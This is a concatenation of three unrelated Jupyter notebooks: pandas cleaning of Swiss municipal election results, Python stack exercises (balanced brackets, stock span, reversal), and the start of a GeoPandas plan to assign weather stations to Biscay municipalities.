Loading the data This is going to be a bit of a marathon...- We first navigate to the BFS "cube": https://www.pxweb.bfs.admin.ch/pxweb/de/px-x-1702020000_105/px-x-1702020000_105/px-x-1702020000_105.px **1st attempt:** Let's download the data in CSV form. (The file is already in the folder `dataprojects/wahlen/`)
###Code
path = 'px-x-1702020000_105.csv'
#df = pd.read_csv(path)
###Output
_____no_output_____
###Markdown
Can we maybe figure this out with a text editor?? Problems:- the encoding- the data does not start on line 1- the delimiter Help for the `read_csv()` function: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html Help on encodings can be found here: - https://docs.python.org/3/library/codecs.html#standard-encodings ... but which encoding?? Trick: use shell code with `!`
###Code
!file -I {path}
df = pd.read_csv(path, delimiter=';', skiprows=2, encoding='latin_1')
df.head(5)
###Output
_____no_output_____
###Markdown
That looks pretty... but:- the municipality names carry ugly leading characters- the important municipality numbers are missing! **2nd attempt:** Let's try it with Excel
###Code
path = 'px-x-1702020000_105.xlsx'
df = pd.read_excel(path)
df.head(10)
###Output
_____no_output_____
###Markdown
... that does not look very encouraging either!!
###Code
df = pd.read_excel(path, skiprows=2)
df.head(5)
###Output
_____no_output_____
###Markdown
- We have to invent column names...
###Code
columns = ['Gemeinde_ID', 'Gemeinde_Name', 'Jahr', 'Jahr2', 'Partei_ID', 'Partei_Name', 'Partei_Anteil']
df = pd.read_excel(path, skiprows=2, names=columns)
df.head(10)
###Output
_____no_output_____
###Markdown
... but what about all those NaNs?? We need to display more rows...
###Code
df.head(100)
###Output
_____no_output_____
###Markdown
We need EVEN MORE ROWS! How does that work? https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.set_option.html
###Code
pd.set_option("display.max_rows", 100)
df.head(100)
###Output
_____no_output_____
###Markdown
We have to fill in the missing fields!Pandas has a VERY HANDY FUNCTION for this: `ffill()`
###Code
df = df.ffill()
df.head(100)
###Output
_____no_output_____
###Markdown
To be safe, let's also have a look at the end:
###Code
df.tail(100)
###Output
_____no_output_____
###Markdown
Uh oh... there is still garbage at the end!We can get rid of it with a simple trick:
###Code
df = df[0:115632]
df
###Output
_____no_output_____
###Markdown
**But...**... before we finally start the analysis, we still have to invest a bit of work Tidying the data We have to replace the three dots with NaN
###Code
df['Partei_Anteil'] = df['Partei_Anteil'].replace('...', np.nan)
df
###Output
_____no_output_____
###Markdown
- What exactly is the second year column for??? Away with it.
###Code
df = df.drop(columns=['Jahr2'])
df
###Output
_____no_output_____
###Markdown
- Districts? We don't want those! (The `.str[]` operator comes in handy here)
###Code
df['Gemeinde_Name'].str[0:2] == '>>'
df = df.drop(index=df[df['Gemeinde_Name'].str[0:2] == '>>'].index)
df
###Output
_____no_output_____
###Markdown
- The dots in front of the municipality names...
can also go
###Code
df['Gemeinde_Name'] = df['Gemeinde_Name'].str.replace('......', '', regex=False)
df.head()
###Output
_____no_output_____
###Markdown
- Gemeinde_ID, Jahr and Partei_ID should be integers
###Code
df['Gemeinde_ID'] = df['Gemeinde_ID'].astype(int)
df['Jahr'] = df['Jahr'].astype(int)
df['Partei_ID'] = df['Partei_ID'].astype(int)
df.head()
df
###Output
_____no_output_____
###Markdown
Nooow we are done and can start the analysis.We export the file. Modifying the structure
###Code
df2 = pd.pivot_table(df, index=['Gemeinde_ID', 'Gemeinde_Name', 'Partei_Name'], columns='Jahr', values='Partei_Anteil')
df2
df2 = df2.reset_index()
df2
###Output
_____no_output_____
###Markdown
Export
###Code
df2.to_csv("Wahlergebnisse 1999 und 2019 in Gemeinden.csv", index=False)
###Output
_____no_output_____
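###Markdown
As a quick sanity check of the exported table, here is a sketch computing each party's change in vote share per municipality. This assumes the pivoted year columns are the integers 1999 and 2019, matching the file name above:
###Code
# change in vote share between the two elections, in percentage points
df2['change'] = df2[2019] - df2[1999]
df2.sort_values('change', ascending=False).head()
###Output
_____no_output_____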
Coding-Ninjas-Data-Structure-and-Algorithm-in-Python-main/Stack/All codes in one.ipynb
###Markdown Code : Stack Using LL ###Code from sys import stdin class Node : def __init__(self, data) : self.data = data self.next = None class Stack : def __init__(self) : self.__head = None self.__size = 0 def getSize(self) : return self.__size def isEmpty(self) : return self.__size == 0 def push(self, data) : newNode = Node(data) if self.__head is None : self.__head = newNode else : newNode.next = self.__head self.__head= newNode self.__size += 1 def pop(self) : if self.__head is None : return -1 ans = self.__head.data self.__head = self.__head.next self.__size -= 1 return ans def top(self) : if self.__head is None : return -1 return self.__head.data #main q = int(stdin.readline().strip()) stack = Stack() while q > 0 : inputs = stdin.readline().strip().split(" ") choice = int(inputs[0]) if choice == 1 : data = int(inputs[1]) stack.push(data) elif choice == 2 : print(stack.pop()) elif choice == 3 : print(stack.top()) elif choice == 4 : print(stack.getSize()) else : if stack.isEmpty() : print("true") else : print("false") q -= 1 ###Output _____no_output_____ ###Markdown Balanced Paranthesis ###Code from sys import stdin def isEmpty(stack) : return len(stack) == 0 def isBalanced(expression) : stack = list() for i in range(len(expression)) : if expression[i] == '(' : stack.append(expression[i]) elif expression[i] == ')' : if isEmpty(stack) : return False topChar = stack.pop(); if expression[i] == ')' and topChar == '(' : continue else : return False return isEmpty(stack); #main expression = stdin.readline().strip() if isBalanced(expression) : print("true") else : print("false") ###Output _____no_output_____ ###Markdown Reverse Stack ###Code from sys import stdin, setrecursionlimit setrecursionlimit(10 ** 6) def reverseStack(inputStack, extraStack) : if len(inputStack) == 0: return; lastElement = inputStack.pop() reverseStack(inputStack, extraStack); while not isEmpty(inputStack) : top = inputStack.pop() extraStack.append(top) inputStack.append(lastElement) while not isEmpty(extraStack) : top = extraStack.pop() inputStack.append(top) '''-------------- Utility Functions --------------''' #Takes a list as a stack and returns whether the stack is empty or not def isEmpty(stack) : return len(stack) == 0 #Taking input using fast I/o method def takeInput() : size = int(stdin.readline().strip()) inputStack = list() if size == 0 : return inputStack values = list(map(int, stdin.readline().strip().split(" "))) inputStack = values return inputStack #main inputStack = takeInput() emptyStack = list() reverseStack(inputStack, emptyStack) while not isEmpty(inputStack) : print(inputStack.pop(), end = " ") ###Output _____no_output_____ ###Markdown Check redundant brackets ###Code from sys import stdin def checkRedundantBrackets(expression) : stk = list() for i in range(len(expression)) : if (expression[i] == '(') or (find(expression[i])) : stk.append(expression[i]) elif expression[i] == ')' : hasOperator = False while not isEmpty(stk) and top(stk) != '(' : stk.pop() hasOperator = True if not hasOperator : return True if not isEmpty(stk) : stk.pop() return False '''-------------- Utility Functions --------------''' def find(ch) : if ch == '+' or ch == '-' or ch == '*' or ch == '/' : return True return False #Takes a list as a stack and returns whether the stack is empty or not def isEmpty(stack) : return len(stack) == 0 #Takes a list as a stack and returns the element at the top def top(stack) : #assuming the stack is never empty return stack[len(stack) - 1] #main expression = stdin.readline().strip() if 
checkRedundantBrackets(expression) : print("true") else : print("false") ###Output _____no_output_____ ###Markdown Stock Span ###Code from sys import stdin def stockSpan(price, n) : stk = list() output = [-1] * n stk.append(0) output[0] = 1 for i in range(1, n) : while (not isEmpty(stk)) and (price[top(stk)] < price[i]) : stk.pop() if isEmpty(stk) : output[i] = i + 1 else : output[i] = i - top(stk) stk.append(i) return output '''-------------- Utility Functions --------------''' #Takes a list as a stack and returns whether the stack is empty or not def isEmpty(stack) : return len(stack) == 0 #Takes a list as a stack and returns the element at the top def top(stack) : #assuming the stack is never empty return stack[len(stack) - 1] def printList(arr) : for i in range(len(arr)) : print(arr[i], end = " ") print() def takeInput(): size = int(stdin.readline().strip()) if size == 0 : return list(), 0 price = list(map(int, stdin.readline().strip().split(" "))) return price, size #main price, n = takeInput() output = stockSpan(price, n) printList(output) ###Output _____no_output_____ ###Markdown Minimum bracket Reversal ###Code from sys import stdin def countBracketReversals(inputString) : length = len(inputString) if length == 0 : return 0 if length % 2 != 0 : return -1 # Only even number of brackets can be balanced stack = list() for i in range(length) : currentChar = inputString[i] if currentChar == '{' : stack.append(currentChar) else : # Pop if there is a balanced pair if (not isEmpty(stack)) and (top(stack) == '{') : stack.pop() else : stack.append(currentChar) count = 0 #Only unbalanced brackets are there in stack now while not isEmpty(stack) : char1 = stack.pop() char2 = stack.pop() ''' When char1 = } and char2 = {, then we need to reverse both of them so count will increase by 2 ''' if char1 != char2 : count += 2 else : count += 1 return count '''-------------- Utility Functions --------------''' #Takes a list as a stack and returns whether the stack is empty or not def isEmpty(stack) : return len(stack) == 0 #Takes a list as a stack and returns the element at the top def top(stack) : #assuming the stack is never empty return stack[len(stack) - 1] #main print(countBracketReversals(stdin.readline().strip())) ###Output _____no_output_____
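###Markdown
A quick sanity check for the linked-list stack defined at the top, exercised directly instead of through stdin (a minimal sketch, assuming the cell with the Stack class has been run):
###Code
s = Stack()
for value in [10, 20, 30]:
    s.push(value)
print(s.top())      # 30, the last element pushed
print(s.pop())      # 30, removes and returns the top
print(s.getSize())  # 2 elements remain
print(s.isEmpty())  # False
###Output
_____no_output_____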
toolkit/xnlp/Explanations Analysis Run 02 - Turkish.ipynb
###Markdown LOC type entities - analysis ###Code loc_group_explanations = explanations[explanations['entity_type'] == "LOC"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1) loc_group_explanations['Loc'].clip(lower=-1.0, upper=1, inplace=False) len(morpho_tag_to_id) loc_group_explanations.size for idx, morpho_tag in enumerate(list(morpho_tag_to_id.keys())): if idx % 9 == 0: fig = plt.figure(int(idx/9)) rem = idx % 9 plt.subplot(3, 3, rem+1) print(morpho_tag) # sns.violinplot(data=list(loc_group_explanations[morpho_tag].clip(lower=-0.5, upper=0.5))) data = loc_group_explanations[morpho_tag].dropna().clip(lower=-0.5, upper=0.5) print(data) if data.size > 0: sns.distplot(data) plt.show() loc_group_explanations mean_loc_group_explanations = loc_group_explanations.mean() mean_loc_group_explanations.sort_values(ascending=False) loc_group_explanations['Loc'].sort_values()[:10] loc_group_explanations['Loc'].sort_values(ascending=False)[:10] loc_group_explanations.hist(['Loc'], range=[-1, 1], bins=100) loc_group_explanations.hist(['Loc'], range=[-0.015, 0.015], bins=100) loc_group_explanations['Loc'].value_counts().sort_values(ascending=False) [(loc_group_explanations['Loc'][loc_group_explanations['Loc'] < 0]).mean(), (loc_group_explanations['Loc'][loc_group_explanations['Loc'] >= 0]).mean()] loc_group_explanations.hist(['Loc^DB'], range=[-1, 1]) loc_group_explanations.hist(['Loc']) loc_group_explanations.hist(['Loc^DB']) loc_group_explanations.hist(['Loc'], range=[-5000, -10], bins=100) loc_group_explanations.hist(['Loc'], range=[1, 1000], bins=100) loc_group_explanations['Loc'][loc_group_explanations['Loc'] < 0].count() loc_group_explanations['Loc'][loc_group_explanations['Loc'] >= 0].count() for morpho_tag in ['Loc', 'Loc^DB']: below_zero = loc_group_explanations[morpho_tag][loc_group_explanations[morpho_tag] < 0].count() above_zero = loc_group_explanations[morpho_tag][loc_group_explanations[morpho_tag] >= 0].count() print(morpho_tag, below_zero, above_zero) ###Output Loc 2681 1818 Loc^DB 653 523 ###Markdown ORG type entities - analysis ###Code org_group_explanations = explanations[explanations['entity_type'] == "ORG"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1) org_group_explanations.mean().sort_values(ascending=False) ###Output _____no_output_____ ###Markdown PER type entities - analysis ###Code per_group_explanations = explanations[explanations['entity_type'] == "PER"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1) per_group_explanations.mean().sort_values(ascending=False) !ls ../../explanations-for-ner-train-finnish-201901* ###Output _____no_output_____
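###Markdown
The below/above-zero counts were computed by hand for 'Loc' and 'Loc^DB'; the same tally can be produced for every morpho tag in one pass. A sketch, assuming loc_group_explanations and morpho_tag_to_id are defined as above.
###Code
# Sketch: sign counts of the explanation scores for all morpho-tag columns
sign_counts = {}
for morpho_tag in morpho_tag_to_id.keys():
    if morpho_tag not in loc_group_explanations.columns:
        continue
    col = loc_group_explanations[morpho_tag].dropna()
    sign_counts[morpho_tag] = (int((col < 0).sum()), int((col >= 0).sum()))

for tag, (below, above) in sorted(sign_counts.items()):
    print(tag, below, above)
###Output
_____no_output_____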
NVIDIA Training/Deployment.ipynb
###Markdown Deployment Which files constitute a "model"?We make a trained network useful by removing it from its training environment and "deploying" it into an application. Start where we left off in DIGITS.DIGITS places the files we need to deploy in a directory that can either be downloaded or just pointed to. Since we're going to be deploying our model on the same server where it was trained, we can just point to the folder path that DIGITS generates. Open DIGITS.From DIGITS home page, select the model that we named "Dogs vs. Cats".DIGITS' "Job Page" for the model is what you see as soon as you create the model, when it is training, and/or if you select the model under DIGITS' "model" tab. The Job Directory is in the top left.![](images/ModelJobView.PNG)**Copy the job directory (highlighted above) and replace FIXME in the code block below. Once you've copied the directory, execute the cell (Shift+Enter) to store it to the variable MODEL_JOB_DIR** ###Code MODEL_JOB_DIR = '##FIXME##' ## Remember to set this to be the job directory for your model !ls $MODEL_JOB_DIR ###Output _____no_output_____ ###Markdown Assuming you copied and pasted well, you will see a list of all files in that directory. If the following instructions do not match what you're seeing, check the copy/paste directions.Again, our "model" consists of two files: the architecture and the weights. The architecture is the file called ```deploy.prototxt``` and the weights are in the most recent snapshot file ```snapshot_iter_.caffemodel.```In this case, snapshot number 735 contains the weights learned after all 5 epochs. ###Code ARCHITECTURE = MODEL_JOB_DIR + '/' + 'deploy.prototxt' WEIGHTS = MODEL_JOB_DIR + '/' + 'snapshot_iter_735.caffemodel' print ("Filepath to Architecture = " + ARCHITECTURE) print("Filepath to weights = "+ WEIGHTS) ###Output _____no_output_____ ###Markdown Next, we need to make sure that the program that we're building can both read and process those files. For this basic type of deployment, we'll need to install (or include) the framework that they were written in to be able to interpret them. We'll learn to deploy to environments that don't require installing the framework later in this course. We'll also need to use the GPU to take advantage of parallel processing. Again, our model consists of hundreds of thousands of operations that can be largely accelerated through parallelization. ###Code import caffe caffe.set_mode_gpu() ###Output _____no_output_____ ###Markdown Next, we'll create a "Classifier" object called "net". The more common the workflow, the easier existing tools will make your project. In this case, image classification is very common, so this next code block simply takes your architecture file and weights file and a bit about the data and makes common actions easy. ###Code # Initialize the Caffe model using the model trained in DIGITS net = caffe.Classifier(ARCHITECTURE, WEIGHTS, channel_swap =(2, 1, 0), #Color images have three channels, Red, Green, and Blue. raw_scale=255) #Each pixel value is a number between 0 and 255 #Each "channel" of our images are 256 x 256 ###Output _____no_output_____ ###Markdown The Classifier class includes a method called "predict", which takes an input of an image as defined above and generates an output of the likelihood of the image belonging to each category. Creating an Expected Input: PreprocessingTo start with something easy, let's attempt to correctly classify a labeled image from the dataset. 
We can load the image and view it by running the cell below. ###Code import matplotlib.pyplot as plt #matplotlib.pyplot allows us to visualize results input_image= caffe.io.load_image('/dli/data/dogscats/train/cats/cat.10941.jpg') plt.imshow(input_image) plt.show() ###Output _____no_output_____ ###Markdown While this is the image we have, it is not the 'input' the network expects. To prepare data for inference, we're going to follow one golden rule:Whatever was done prior to training must be done prior to inferenceIn the last section, you saw the files that were generated when DIGITS trained your model. In this section, we'll examine the files generated when DIGITS created your dataset.The job directory for the **dataset** you just trained from is found by selecting the dataset from the model page "Dogs and Cats" and/or if you select the dataset under DIGITS' "dataset" tab. It's in the same place it was for the model, but should be a different number.![](images/datasetjobdir.PNG)Replace FIXME with it and execute the code below to set DATA_JOB_DIR to the right filepath and examine what's inside: ###Code DATA_JOB_DIR = '##FIXME##' ## Remember to set this to be the job directory for your model !ls $DATA_JOB_DIR ###Output _____no_output_____ ###Markdown Again, there is more information here than you need (for now). There is an infinite amount that you *could* know about data science and data prep which will become clear as you work through a variety of deep learning problems. In this case, DIGITS did two steps prior to training. We call this *preprocessing.*1) DIGITS resized the images to 256X256 color images ###Code import cv2 input_image=cv2.resize(input_image, (256, 256), 0,0) plt.imshow(input_image) plt.show() ###Output _____no_output_____ ###Markdown 2) DIGITS *normalized* the images by subtracting the mean image from each image to reduce the computation necessary to train. Load the mean image and subtract it from the test image below: ###Code mean_image = caffe.io.load_image(DATA_JOB_DIR+'/mean.jpg') ready_image = input_image-mean_image ###Output _____no_output_____ ###Markdown We've now taken data as it was and converted it into data that our network expects. Next, let's see what output our network creates. Forward Propagation: Using your modelThis is what we care about. Let's take a look at the function: prediction = net.predict([grid_square]).Like any [function](https://www.khanacademy.org/computing/computer-programming/programmingfunctions), net.predict passes an input, ready_image, and returns an output, prediction. Unlike other functions, this function isn't following a list of steps, instead, it's performing layer after layer of matrix math to transform an image into a vector of probabilities. Run the cell below to see the prediction from labeled the labeled data above. ###Code # make prediction prediction = net.predict([ready_image]) print prediction ###Output _____no_output_____ ###Markdown Interesting, but doesn't contain all that much information. Our network took a normalized 256x256 color image and generated a vector of length 2. Generating a useful output: PostprocessingAt this point, we can really build whatever we want. Your only limit is your programming experience. Before getting creative, let's build something basic. This code will determine whether our network output a higher value for the likelihood of "dog" than it did for "cat." If so, it will display an image that would be appropriate if a dog approached our simulated doggy door. 
If not, the image represents what we'd want to happen if our network determined a cat was at the door. ###Code print("Input image:") plt.imshow(input_image) plt.show() print("Output:") if prediction.argmax()==0: print "Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif" else: print "Welcome dog! https://www.flickr.com/photos/aidras/5379402670" ###Output _____no_output_____ ###Markdown Here, now is everything in one place so you can test with an image that a doggy door might see. ###Code ##Create an input our network expects input_image= caffe.io.load_image('/dli/data/fromnest.PNG') input_image=cv2.resize(input_image, (256, 256), 0,0) ready_image = input_image-mean_image ##Treat our network as a function that takes an input and generates an output prediction = net.predict([ready_image]) print("Input Image:") plt.imshow(input_image) plt.show() print(prediction) ##Create a useful output print("Output:") if prediction.argmax()==0: print "Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif" else: print "Welcome dog! https://www.flickr.com/photos/aidras/5379402670" ###Output _____no_output_____ ###Markdown Essentially, we've created a simulator for our doggy door challenge. We've created an application that takes an input from a camera, converts it to a data type our network expects, generates an output, and then converts that output into something useful to a user. You could see how you might easily have a positive output control a motor in a doggy door. With regards to deep learning, you have what you need! To see what other images you can try in the code block above, list the test images (images that weren't used for training) can be found by running the command below. Expect some of these images to output the wrong classification. Test them until you're satisfied and then continue in the course to find out how to improve performance! ###Code !ls /dli/data/dogscats/test ###Output _____no_output_____ ###Markdown Putting it all togetherLet's put this deployment process together to see how it might look outside of this Jupyter notebook. In the Python file at [pythondeployment.py](../../../../edit/tasks/task3/task/pythondeployment.py), you'll see the same code as above, but consolidated into one file. You'll use this approach during your end of course assessment, so take a look. Insert the filepath to a test image here to visualize it. ###Code TEST_IMAGE = '/dli/data/dogscats/test/1.jpg' display= caffe.io.load_image(TEST_IMAGE) plt.imshow(display) plt.show() ###Output _____no_output_____ ###Markdown And then run our small python application with that image as input below. Ignore most of the output and scroll to the bottom. (Even errors and warnings are fine.) ###Code !python pythondeployment.py $TEST_IMAGE 2>/dev/null ###Output _____no_output_____
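###Markdown
For reference, here is a minimal sketch of what a consolidated script like pythondeployment.py could look like, reconstructed from the cells above. This is an assumption (the actual file may differ), the three file paths are placeholders, and it presumes the same caffe environment used throughout this notebook.
###Code
# Hypothetical reconstruction of pythondeployment.py (paths are placeholders)
import sys
import caffe
import cv2

ARCHITECTURE = 'deploy.prototxt'           # placeholder: architecture file
WEIGHTS = 'snapshot_iter_735.caffemodel'   # placeholder: weights snapshot
MEAN_IMAGE = 'mean.jpg'                    # placeholder: dataset mean image

caffe.set_mode_gpu()
net = caffe.Classifier(ARCHITECTURE, WEIGHTS,
                       channel_swap=(2, 1, 0), raw_scale=255)

# 1) Preprocess exactly as DIGITS did before training
input_image = caffe.io.load_image(sys.argv[1])
input_image = cv2.resize(input_image, (256, 256), 0, 0)
ready_image = input_image - caffe.io.load_image(MEAN_IMAGE)

# 2) Forward propagate through the network
prediction = net.predict([ready_image])

# 3) Postprocess the probabilities into a doggy-door decision
if prediction.argmax() == 0:
    print("Sorry cat :(")
else:
    print("Welcome dog!")
###Output
_____no_output_____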
notebooks/nlp/6_conv_net_sentiment_classifier_for_imdb.ipynb
###Markdown Convolutional Net for Sentiment Classification This Conv Net performs sentiment analysis on the IMDB review dataset. ###Code import os from tensorflow.keras.datasets import imdb from tensorflow.keras.preprocessing.sequence import pad_sequences from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Flatten, Dropout, Activation from tensorflow.keras.layers import Layer, Embedding, Conv1D, SpatialDropout1D, GlobalMaxPool1D from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping from tensorflow.keras.models import load_model import sklearn.metrics from sklearn.metrics import roc_auc_score import numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline ###Output _____no_output_____ ###Markdown Set Hyperparameters ###Code output_dir = 'model_output/conv' epochs = 3 batch_size = 64 patience = 10 val_split = .3 n_dim = 192 n_unique_words = 8000 max_review_length = 200 pad_type = trunc_type = 'pre' n_conv = 128 k_conv = 3 n_dense = 256 dropout = 0.5 ###Output _____no_output_____ ###Markdown Load Data ###Code (X_train, y_train), (X_valid, y_valid) = imdb.load_data(num_words=n_unique_words) ###Output _____no_output_____ ###Markdown Preprocess Data ###Code X_train = pad_sequences(X_train, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0) X_valid = pad_sequences(X_valid, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0) ###Output _____no_output_____ ###Markdown Design Conv Net Architecture ###Code model = Sequential() model.add(Embedding(n_unique_words, n_dim, input_length=max_review_length)) model.add(Conv1D(n_conv, k_conv, activation='relu')) model.add(GlobalMaxPool1D()) model.add(Dense(n_dense, activation='relu')) model.add(Dense(n_dense, activation='relu')) model.add(Dropout(dropout)) model.add(Dense(1, activation='sigmoid')) model.summary() ###Output _____no_output_____ ###Markdown Configure the Model ###Code model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) modelCheckpoint = ModelCheckpoint(monitor='val_accuracy', filepath=output_dir + '/imdb-cnn.hdf5', save_best_only=True, mode='max') earlyStopping = EarlyStopping(monitor='val_accuracy', mode='max', patience=patience) if not os.path.exists(output_dir): os.makedirs(output_dir) ###Output _____no_output_____ ###Markdown TensorBoard ###Code tensorboard = TensorBoard("../logs/imdb-cnn") ###Output _____no_output_____ ###Markdown Train the Model ###Code history = model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_split=val_split, callbacks=[modelCheckpoint, earlyStopping, tensorboard]) ###Output _____no_output_____ ###Markdown Evaluate ###Code model = load_model(output_dir+'/imdb-cnn.hdf5') y_hat = model.predict_proba(X_valid) final_loss, final_acc = model.evaluate(X_valid, y_valid, verbose = 2) print("Final loss: {0:.4f}, final accuracy: {1:.4f}".format(final_loss, final_acc)) plt.hist(y_hat) _ = plt.axvline(x=0.5, color='orange') pct_auc = roc_auc_score(y_valid, y_hat) * 100 print('{:0.2f}'.format(pct_auc)) print(np.std(history.history['loss'])) fpr, tpr, _ = sklearn.metrics.roc_curve(y_valid, y_hat) roc_auc = sklearn.metrics.auc(fpr, tpr) plt.figure() lw = 2 plt.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc) plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--') plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') 
plt.title('Receiver Operating Characteristic') plt.legend(loc="lower right") plt.show() ###Output _____no_output_____
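###Markdown
To score a brand-new review, the raw text must be encoded with the same word index the dataset was built from. A sketch: Keras' IMDB loader shifts every word rank by 3 (0 = padding, 1 = start, 2 = out-of-vocabulary), so the encoder below applies the same offset; the helper name and sample sentence are our own.
###Code
# Sketch: encode a raw-text review and score it with the trained model
word_index = imdb.get_word_index()  # word -> frequency rank (1-based)

def encode_review(text, num_words=n_unique_words, offset=3):
    ids = []
    for w in text.lower().split():
        rank = word_index.get(w.strip('.,!?";:()'), 0)
        # keep in-vocabulary words (shifted); map everything else to OOV (2)
        ids.append(rank + offset if 0 < rank and rank + offset < num_words else 2)
    return pad_sequences([ids], maxlen=max_review_length,
                         padding=pad_type, truncating=trunc_type, value=0)

sample = "this movie was wonderful with a brilliant cast and a moving story"
print(model.predict(encode_review(sample)))  # probability of positive sentiment
###Output
_____no_output_____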
v1/notebooks/3_data_pipeline_get_data.ipynb
###Markdown Data Pipeline to Get Data ###Code %load_ext lab_black %load_ext autoreload %autoreload 2 import pandas as pd from prefect import Flow ###Output _____no_output_____ ###Markdown About Use a data pipeline to assemble the data used in the dashboard. User Inputs ###Code open_tor_data_url = ( "https://ckan0.cf.opendata.inter.prod-toronto.ca/api/3/action/package_show" ) trips_data_glob_str = "data/raw/*.csv" stations_params = {"id": "2b44db0d-eea9-442d-b038-79335368ad5a"} stations_cols_wanted = [ "station_id", "name", "physical_configuration", "lat", "lon", "altitude", "address", "capacity", "physicalkey", "transitcard", "creditcard", "phone", ] neigh_profile_params = {"id": "6e19a90f-971c-46b3-852c-0c48c436d1fc"} pt_params = {"id": "7795b45e-e65a-4465-81fc-c36b9dfff169"} poi_params = {"id": "965247c0-c72e-49b4-bb1a-879cf98e1a32"} ch_params = {"id": "c7be2ee7-d317-4a28-8cbe-bff1ce116b46"} neigh_boundary_params = {"id": "4def3f65-2a65-4a4f-83c4-b2a4aed72d46"} neigh_cols_to_show = [ "AREA_ID", "AREA_SHORT_CODE", "AREA_LONG_CODE", "AREA_NAME", "Shape__Area", "Shape__Length", "LATITUDE", "AREA_LATITUDE", "LONGITUDE", "AREA_LONGITUDE", "geometry", ] trips_nan_cols = [ "START_STATION_ID", "END_STATION_ID", "START_STATION_NAME", "END_STATION_NAME", ] trips_duplicated_cols = ["TRIP_ID", "START_TIME", "END_TIME"] cols = ["STATION_NAME", "year", "month", "day", "hour"] # Exporting to staged CSV files cols_to_export = [ "STATION_NAME", "YEAR", "MONTH", "DAY", "HOUR", "USER_TYPE", "NUM_TRIPS", "DURATION_MEAN", "AREA_NAME", "PHYSICAL_CONFIGURATION", "CAPACITY", "PHYSICALKEY", "TRANSITCARD", "CREDITCARD", "PHONE", "NEIGH_TRANSIT_STOPS", "NEIGH_COLLEGES_UNIVS", "NEIGH_CULTURAL_ATTRACTIONS", "NEIGH_PLACES_OF_INTEREST", ] nrows_per_staged_csv_file = 350_000 %aimport src.data_pipe_utils import src.data_pipe_utils as dpu ###Output /home/elsdes3/Downloads/bikeshare-dash/.tox/build/lib/python3.9/site-packages/geopandas/_compat.py:111: UserWarning: The Shapely GEOS version (3.10.2-CAPI-1.16.0) is incompatible with the GEOS version PyGEOS was compiled with (3.10.0-CAPI-1.16.0). Conversions between both will be slow. 
warnings.warn( ###Markdown Data Pipeline Define Pipeline ###Code with Flow("My Functional Flow") as flow: df_stations = dpu.get_bikeshare_stations_metadata( open_tor_data_url, stations_params, stations_cols_wanted, ) df = dpu.get_bikeshare_trips_data( trips_data_glob_str, trips_nan_cols, trips_duplicated_cols, ) dfch_essentials = dpu.get_city_cultural_hotspots_data(open_tor_data_url, ch_params) df_poi = dpu.get_city_points_of_interest_data(open_tor_data_url, poi_params) gdf = dpu.get_city_neighbourhood_boundary_data( open_tor_data_url, neigh_boundary_params, neigh_cols_to_show, ) df_pt_slice = dpu.get_city_public_transit_locations_data( open_tor_data_url, pt_params ) df_coll_univ = dpu.get_city_college_university_locations_data() df_neigh_demog = dpu.get_neighbourhood_profile_data( open_tor_data_url, neigh_profile_params ) ( df_poi_new, dfch_essentials_new, df_coll_univ_new, df_pt_slice_new, df_neigh_stats, df_stations_new, ) = dpu.aggregate_data( gdf, df_poi, dfch_essentials, df_coll_univ, df_pt_slice, df_neigh_demog, df_stations, ) df_hour_by_station_merged = dpu.combine_trips_neighbourhood_data( df, cols, df_stations_new ) dpu.export_aggregated_data_multiple_csvs( df_hour_by_station_merged, cols_to_export, nrows_per_staged_csv_file, ) ###Output _____no_output_____ ###Markdown Run Pipeline ###Code %%time state = flow.run() %%time # print(state.result[gdf].shape) # display(state.result[gdf].result.describe()) display(state.result[df_neigh_demog].result.describe()) # display(state.result[df_poi_new].result.describe()) # display(state.result[dfch_essentials_new].result.describe()) # display(state.result[df_coll_univ_new].result.describe()) # display(state.result[df_pt_slice_new].result.describe()) with pd.option_context('display.max_columns', 100): display(state.result[df_neigh_stats].result.describe()) display(state.result[df_stations_new].result.describe()) display(state.result[df_hour_by_station_merged].result.describe()) ###Output _____no_output_____
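###Markdown
Because everything runs inside a Prefect flow, the run can also be checked programmatically before trusting the staged CSVs. A small sketch using the same Prefect 1.x API as above.
###Code
# Sketch: inspect the flow run state (Prefect 1.x)
print("Flow run successful:", state.is_successful())

# Per-task states, handy to spot which step failed on a bad run
for task, task_state in state.result.items():
    print(task.name, "->", task_state)

# Pull one task's return value out of the run state (same pattern as above)
print(state.result[df_stations].result.shape)
###Output
_____no_output_____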
B_Submissions_Kopuru_competition/2021-05-12_submit/batch_OLSyears/workerbee01_HONEYCOMB.ipynb
###Markdown Challenge: Assigning Weather Stations to each Municipality **OBJECTIVE: We have 102 weather stations, and each of those stations must be assigned to one of the 112 Biscay Province Municipalities.** Note: a weather station may be shared by multiple Municipalities. **Assumptions:*** We will take the center coordinates of each Municipality as a reference point, because it represents an average central position of the area.* We will use the Mercator projection (EPSG:25830) with coordinates in UTM because: - The client data is already in UTM; - Working in UTM will give distance results in meters directly; - This projection is good for large-scale analysis. **Note:** For more precision we could use the PlateCarree projection (EPSG:32663), designed specifically to preserve distances on a map. (This task is still pending, and we would only see tiny differences in the absolute values, which from a business perspective we do not require for this exercise.) Rationale / Engine The idea is to use GeoPandas to solve this problem: we can use the library's methods to calculate distances and iterate over them, thus avoiding a very manual process and achieving higher accuracy. We need:- 1) A **Geodataframe** with a geometry shapely object for the **Biscay Municipalities** (which we already have from Maps Exploration)- 2) A **Geodataframe** with a geometry shapely object for the **Weather Stations** (we only have a CSV file with the weather stations' UTM 